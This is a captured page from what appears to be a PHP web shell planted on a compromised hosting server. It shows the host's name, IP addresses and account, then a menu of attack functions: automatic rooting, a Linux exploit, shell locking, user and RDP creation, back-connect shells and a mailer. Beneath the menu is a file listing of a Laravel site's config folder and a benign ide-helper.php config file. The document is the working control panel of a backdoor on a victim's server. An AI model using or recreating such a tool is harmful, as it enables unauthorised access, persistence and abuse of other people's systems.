Linux server1.signalhg.team 4.18.0-553.134.1.el8_10.x86_64 #1 SMP Tue Jun 16 16:05:57 EDT 2026 x86_64
Apache
: 209.74.80.147 | : 216.73.216.252
150 Domain
8.1.34
signgwph
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
signgwph /
signaltechschedule.com /
config /
[ HOME SHELL ]
Name
Size
Permission
Action
infyom
[ DIR ]
drwxr-xr-x
app.php
7.76
KB
-rw-r--r--
auth.php
3.93
KB
-rw-r--r--
broadcasting.php
2.1
KB
-rw-r--r--
cache.php
3.26
KB
-rw-r--r--
captcha.php
154
B
-rw-r--r--
cors.php
846
B
-rw-r--r--
database.php
5.17
KB
-rw-r--r--
datatables.php
3.72
KB
-rw-r--r--
excel.php
6.06
KB
-rw-r--r--
filesystems.php
2.61
KB
-rw-r--r--
flare.php
1.38
KB
-rw-r--r--
flutterwave.php
749
B
-rw-r--r--
google-calendar.php
1.17
KB
-rw-r--r--
google2fa.php
1.71
KB
-rw-r--r--
hashing.php
1.54
KB
-rw-r--r--
ide-helper.php
6.55
KB
-rw-r--r--
ignition.php
4.28
KB
-rw-r--r--
livewire-tables.php
2.88
KB
-rw-r--r--
livewire.php
6.23
KB
-rw-r--r--
localization-js.php
407
B
-rw-r--r--
logging.php
4.07
KB
-rw-r--r--
logviewer.php
489
B
-rw-r--r--
mail.php
4.08
KB
-rw-r--r--
medialibrary.php
6.9
KB
-rw-r--r--
modules.php
10.4
KB
-rw-r--r--
paypal.php
1.03
KB
-rw-r--r--
paystack.php
724
B
-rw-r--r--
permission.php
4.35
KB
-rw-r--r--
phonepe.php
349
B
-rw-r--r--
purifier.php
4.48
KB
-rw-r--r--
queue.php
2.84
KB
-rw-r--r--
sanctum.php
2.24
KB
-rw-r--r--
services.php
1.42
KB
-rw-r--r--
session.php
6.86
KB
-rw-r--r--
tinker.php
1.45
KB
-rw-r--r--
trustedproxy.php
1.98
KB
-rw-r--r--
twilio.php
135
B
-rw-r--r--
view.php
1.03
KB
-rw-r--r--
zoom.php
428
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : ide-helper.php
<?php return [ /* |-------------------------------------------------------------------------- | Filename & Format |-------------------------------------------------------------------------- | | The default filename (without extension) and the format (php or json) | */ 'filename' => '_ide_helper', 'format' => 'php', 'meta_filename' => '.phpstorm.meta.php', /* |-------------------------------------------------------------------------- | Fluent helpers |-------------------------------------------------------------------------- | | Set to true to generate commonly used Fluent methods | */ 'include_fluent' => false, /* |-------------------------------------------------------------------------- | Factory Builders |-------------------------------------------------------------------------- | | Set to true to generate factory generators for better factory() | method auto-completion. | */ 'include_factory_builders' => false, /* |-------------------------------------------------------------------------- | Write Model Magic methods |-------------------------------------------------------------------------- | | Set to false to disable write magic methods of model | */ 'write_model_magic_where' => true, /* |-------------------------------------------------------------------------- | Write Eloquent Model Mixins |-------------------------------------------------------------------------- | | This will add the necessary DocBlock mixins to the model class | contained in the Laravel Framework. This helps the IDE with | auto-completion. | | Please be aware that this setting changes a file within the /vendor directory. | */ 'write_eloquent_model_mixins' => false, /* |-------------------------------------------------------------------------- | Helper files to include |-------------------------------------------------------------------------- | | Include helper files. By default not included, but can be toggled with the | -- helpers (-H) option. Extra helper files can be included. | */ 'include_helpers' => false, 'helper_files' => [ base_path().'/vendor/laravel/framework/src/Illuminate/Support/helpers.php', ], /* |-------------------------------------------------------------------------- | Model locations to include |-------------------------------------------------------------------------- | | Define in which directories the ide-helper:models command should look | for models. | */ 'model_locations' => [ 'app', ], /* |-------------------------------------------------------------------------- | Extra classes |-------------------------------------------------------------------------- | | These implementations are not really extended, but called with magic functions | */ 'extra' => [ 'Eloquent' => ['Illuminate\Database\Eloquent\Builder', 'Illuminate\Database\Query\Builder'], 'Session' => ['Illuminate\Session\Store'], ], 'magic' => [], /* |-------------------------------------------------------------------------- | Interface implementations |-------------------------------------------------------------------------- | | These interfaces will be replaced with the implementing class. Some interfaces | are detected by the helpers, others can be listed below. | */ 'interfaces' => [ ], /* |-------------------------------------------------------------------------- | Support for custom DB types |-------------------------------------------------------------------------- | | This setting allow you to map any custom database type (that you may have | created using CREATE TYPE statement or imported using database plugin | / extension to a Doctrine type. | | Each key in this array is a name of the Doctrine2 DBAL Platform. Currently valid names are: | 'postgresql', 'db2', 'drizzle', 'mysql', 'oracle', 'sqlanywhere', 'sqlite', 'mssql' | | This name is returned by getName() method of the specific Doctrine/DBAL/Platforms/AbstractPlatform descendant | | The value of the array is an array of type mappings. Key is the name of the custom type, | (for example, "jsonb" from Postgres 9.4) and the value is the name of the corresponding Doctrine2 type (in | our case it is 'json_array'. Doctrine types are listed here: | http://doctrine-dbal.readthedocs.org/en/latest/reference/types.html | | So to support jsonb in your models when working with Postgres, just add the following entry to the array below: | | "postgresql" => array( | "jsonb" => "json_array", | ), | */ 'custom_db_types' => [ ], /* |-------------------------------------------------------------------------- | Support for camel cased models |-------------------------------------------------------------------------- | | There are some Laravel packages (such as Eloquence) that allow for accessing | Eloquent model properties via camel case, instead of snake case. | | Enabling this option will support these packages by saving all model | properties as camel case, instead of snake case. | | For example, normally you would see this: | | * @property \Illuminate\Support\Carbon $created_at | * @property \Illuminate\Support\Carbon $updated_at | | With this enabled, the properties will be this: | | * @property \Illuminate\Support\Carbon $createdAt | * @property \Illuminate\Support\Carbon $updatedAt | | Note, it is currently an all-or-nothing option. | */ 'model_camel_case_properties' => false, /* |-------------------------------------------------------------------------- | Property Casts |-------------------------------------------------------------------------- | | Cast the given "real type" to the given "type". | */ 'type_overrides' => [ 'integer' => 'int', 'boolean' => 'bool', ], /* |-------------------------------------------------------------------------- | Include DocBlocks from classes |-------------------------------------------------------------------------- | | Include DocBlocks from classes to allow additional code inspection for | magic methods and properties. | */ 'include_class_docblocks' => false, ];
Close